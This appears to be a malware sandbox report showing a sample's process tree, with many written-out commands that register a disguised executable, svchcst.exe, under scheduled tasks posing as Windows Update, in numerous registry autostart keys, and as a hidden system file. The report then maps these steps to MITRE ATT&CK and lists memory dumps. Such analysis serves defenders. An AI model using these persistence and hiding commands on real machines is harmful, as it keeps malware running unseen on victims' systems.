C:\Windows\system32\cmd.exe /C schtasks /create /tn WindowsUpdate /tr C:\Users\Public\svchcst.exe /sc minute /mo 1
2⤵
PID:1408

C:\Windows\system32\schtasks.exe
schtasks /create /tn WindowsUpdate /tr C:\Users\Public\svchcst.exe /sc minute /mo 1
3⤵
- Creates scheduled task(s)
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN WindewsUpdate /TR C:\Users\Public\svchcst.exe
2⤵
PID:4628

C:\Windows\system32\schtasks.exe
SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN WindewsUpdate /TR C:\Users\Public\svchcst.exe
3⤵
- Creates scheduled task(s)
PID:1068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:4552

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load" /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:2076

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load" /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:5056

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds Run key to start application
PID:3572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:64

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds Run key to start application
PID:3796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:3264

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds Run key to start application
PID:4756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:4736

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds Run key to start application
PID:3340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:812

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds Run key to start application
PID:4836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:4684

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds Run key to start application
PID:4176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:4160

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds Run key to start application
PID:4820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:4808

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds policy Run key to start application
PID:4192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:3252

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Adds policy Run key to start application
PID:576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\Userinit /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
2⤵
PID:832

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\Userinit /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
PID:1168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C attrib C:sersPublicsvchcst.exe +s +h
2⤵
PID:888

C:\Windows\system32\attrib.exe
attrib C:sersPublicsvchcst.exe +s +h
3⤵
- Views/modifies file attributes
PID:1336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

2

T1060

Hidden Files and Directories

2

T1158

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

3

T1112

Hidden Files and Directories

2

T1158

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/64-41-0x0000000000000000-mapping.dmp

Download
memory/216-29-0x0000000000000000-mapping.dmp

Download
memory/576-56-0x0000000000000000-mapping.dmp

Download
memory/584-3-0x0000000000000000-mapping.dmp

Download
memory/812-47-0x0000000000000000-mapping.dmp

Download
memory/828-4-0x0000000000000000-mapping.dmp

Download
memory/832-57-0x0000000000000000-mapping.dmp

Download
memory/888-59-0x0000000000000000-mapping.dmp

Download
memory/928-5-0x0000000000000000-mapping.dmp

Download
memory/1044-6-0x0000000000000000-mapping.dmp

Download
memory/1068-34-0x0000000000000000-mapping.dmp

Download
memory/1144-7-0x0000000000000000-mapping.dmp

Download
memory/1168-58-0x0000000000000000-mapping.dmp

Download
memory/1336-60-0x0000000000000000-mapping.dmp

Download
memory/1344-8-0x0000000000000000-mapping.dmp

Download
memory/1408-31-0x0000000000000000-mapping.dmp

Download
memory/1416-9-0x0000000000000000-mapping.dmp

Download
memory/1712-10-0x0000000000000000-mapping.dmp

Download
memory/1828-11-0x0000000000000000-mapping.dmp

Download
memory/1976-28-0x0000000000000000-mapping.dmp

Download
memory/2076-37-0x0000000000000000-mapping.dmp

Download
memory/2304-20-0x0000000000000000-mapping.dmp

Download
memory/2496-21-0x0000000000000000-mapping.dmp

Download
memory/2540-22-0x0000000000000000-mapping.dmp

Download
memory/2956-0-0x0000000000610000-0x0000000000650000-memory.dmp

Filesize
256KB

Download
memory/3096-24-0x0000000000000000-mapping.dmp

Download
memory/3180-15-0x0000000000000000-mapping.dmp

Download
memory/3208-23-0x0000000000000000-mapping.dmp

Download
memory/3244-12-0x0000000000000000-mapping.dmp

Download
memory/3252-55-0x0000000000000000-mapping.dmp

Download
memory/3264-43-0x0000000000000000-mapping.dmp

Download
memory/3340-46-0x0000000000000000-mapping.dmp

Download
memory/3572-40-0x0000000000000000-mapping.dmp

Download
memory/3640-25-0x0000000000000000-mapping.dmp

Download
memory/3796-42-0x0000000000000000-mapping.dmp

Download
memory/3908-1-0x0000000000000000-mapping.dmp

Download
memory/3972-38-0x0000000000000000-mapping.dmp

Download
memory/4092-13-0x0000000000000000-mapping.dmp

Download
memory/4160-51-0x0000000000000000-mapping.dmp

Download
memory/4176-50-0x0000000000000000-mapping.dmp

Download
memory/4192-54-0x0000000000000000-mapping.dmp

Download
memory/4260-2-0x0000000000000000-mapping.dmp

Download
memory/4292-14-0x0000000000000000-mapping.dmp

Download
memory/4352-17-0x0000000000000000-mapping.dmp

Download
memory/4364-16-0x0000000000000000-mapping.dmp

Download
memory/4436-18-0x0000000000000000-mapping.dmp

Download
memory/4480-19-0x0000000000000000-mapping.dmp

Download
memory/4512-30-0x0000000000000000-mapping.dmp

Download
memory/4532-32-0x0000000000000000-mapping.dmp

Download
memory/4552-35-0x0000000000000000-mapping.dmp

Download
memory/4608-26-0x0000000000000000-mapping.dmp

Download
memory/4616-27-0x0000000000000000-mapping.dmp

Download
memory/4628-33-0x0000000000000000-mapping.dmp

Download
memory/4684-49-0x0000000000000000-mapping.dmp

Download
memory/4736-45-0x0000000000000000-mapping.dmp

Download
memory/4756-44-0x0000000000000000-mapping.dmp

Download
memory/4808-53-0x0000000000000000-mapping.dmp

Download
memory/4820-52-0x0000000000000000-mapping.dmp

Download
memory/4836-48-0x0000000000000000-mapping.dmp

Download
memory/4848-36-0x0000000000000000-mapping.dmp

Download
memory/5056-39-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads